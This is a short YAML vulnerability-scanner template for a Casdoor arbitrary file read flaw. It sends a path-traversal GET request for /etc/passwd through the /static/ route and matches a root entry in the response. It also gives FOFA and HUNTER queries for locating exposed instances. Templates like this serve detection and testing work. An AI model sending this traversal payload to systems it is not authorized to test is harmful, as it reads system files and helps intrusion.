http:
    - matchers:
        - status:
            - 200
          type: status
        - part: body
          regex:
            - 'root:.*?:[0-9]*:[0-9]*:'
          type: regex
      matchers-condition: and
      method: GET
      path:
        - '{{BaseURL}}/static/../../../../../../../../../../../etc/passwd'
id: casdoor-static-fileread
info:
    author: zan8in
    description: |-
        HUNTER: web.title="Casdoor"
        FOFA: title="Casdoor"
    name: Casdoor 任意文件读取漏洞
    severity: high
    tags:
        - casdoor
        - fileread
        - Casdoor
